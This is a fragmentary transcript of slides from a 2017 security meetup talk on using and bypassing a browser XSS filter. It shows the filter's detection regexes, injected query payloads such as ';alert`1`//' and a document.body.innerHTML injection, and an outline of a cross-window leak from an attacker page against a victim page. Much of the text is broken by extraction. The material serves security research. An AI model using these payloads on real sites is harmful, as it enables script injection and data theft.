
How to Use the XSS Filter / Shibuya.XSS techtalk #9

Slides from Shibuya.XSS techtalk #9, held on 2017/3/30.

Masato Kinugawa

March 31, 2017

Transcript


  5. https://example.com/?q=">
    ">

  6. https://example.com/?q=">
    ">

  7. https://addons.mozilla.org/ja/firefox/addon/noscript/

  8. HTTP/1.1 200 OK
    Date: Tue, 28 Mar 2017 06:16:00 GMT
    Expires: -1
    Cache-Control: private, max-age=0
    Content-Type: text/html; charset=UTF-8
    Server: gws
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: SAMEORIGIN


  12. https://example.com/?q=">
    https://example.com/#5382863726995448701
    ">
    ">

  14. ">
    https://example.com/?q=">

  15. ">
    https://example.com/?q=">

  16. https://example.com/?q=">
    https://example.com/#5382863726995448701

  17. <script> - Google Search
    (function(){window.google={kEI: [...]
    https://www.google.co.jp/search?q=<script>

  18. if(jQuery){
    // Expected
    }else{
    // ???
    }
    https://example.com/?

  20. {{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}}
    [...]
    {(v|(?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(b|(?0
    *((66)|(42)|(98)|(62));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(?0*((83)|(53)
    |(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(?0*((67)|(43)|(99)|(63)
    );?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(?0*((82)|(52)|(114)|(72));?))([\t]|
    (&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9
    |(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)|
    A|D);?)|(tab;)|(newline;))))*(t|(?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(ta
    b;)|(newline;))))*)?(:|(&((#x?0*((58)|(3A));?)|(colon;)))).}
    {{}
    {{[...]
    {{[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.}
    {[...]
    ">

  21. [ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.
    ">

  22. ">
    [\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}
    x="";alert(1)//"

  24. https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf
    http://d.hatena.ne.jp/teracc/20090622

  25. https://www.slideshare.net/masatokinugawa/xxn-ja

  26. [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in))
    .+?[.].+?=
    q = "";document#body.innerHTML="<xss>";
    URL: ?q=";document.body.innerHTML="

  27. [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in))
    .+?[.].+?=
    <script src="//example.co.jp/test.js"
    type="text/javascript">
    URL: ?"/++.+++=

  28. "style=:\
    javascript:-
    vbscript:-
    vbs:-
    ",x[]=
    "{toString:
    "{valueOf:

  29. type="text/javascript">

  30. window#name//Syntax Error
    window^name//Syntax OK
    window.name

  32. url=location.search.slice(1);
    if(url^indexOf(":")!=-1){
    url=null;
    }
    onload=function(){
    if(url){location=url;}
    }

  33. https://example.com/?q=";alert`1`//
    q = "";alert`1`//";
    https://www.slideshare.net/x00mario/es6-en/34
    ECMAScript 6 from an Attacker's Perspective
    - Breaking Frameworks, Sandboxes, and everything else

  34. https://example.com/?q=${alert(1)}``//&`+++`
    https://example.com/?q=[USER_INPUT]

    foo=``;
    q="[USER_INPUT]";

    foo=`#;
    q="${alert(1)}#`//";

  35. https://example.com/?+onfiles+++=.
    type="text/javascript">
    [...]

  36. https://bugs.chromium.org/p/chromium/issues/detail?id=654794

  38. http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html

  39. https://VICTIM/
    https://VICTIM/?

    IFRAME ERROR
    https://ATTACKER/

    win=window.open(…)
    if(win.length == 0){
    //
    //
    }else{
    //
    }

  41. https://www.youtube.com/watch?v=IMDWjKFbsJE

  42. HTTP/1.1 200 OK
    [...]
    Server: gws
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: SAMEORIGIN

  43. https://accounts.google.com/ServiceLogin?

  44. google.ae, google.as, google.ca, google.co, google.co.in, google.co.jp, google.co.kr, google.co.nz, google.co.uk, google.com.br, google.com.mx, google.de, google.es, google.fr, google.it, google.pl, google.pt, google.ru, ...

  47. https://example.com/

  48. https://example.com/?

  50. 0x01-08 0x0E-1F
    !"$%'()*;=^`|~
    0x09-0D 0x20 +
    &
    >
    #,/:?[\]{}
    -.@_
    A a
    0x00
    0-9 <
    B-Z b-z

  52. [email protected]
    {[\"\'`][ ]*(([^a-z0-9~_:\'\"` ])|(in)).+?{[.]}.+?=}

  55. https://www.google.co.jp/?"[email protected]=

  56. https://www.google.de/?"[email protected]=
    https://www.google.ru/?"[email protected]=

  57. https://www.google.ru/?"[email protected]=
    https://www.google.ca/?"[email protected]=
    ...
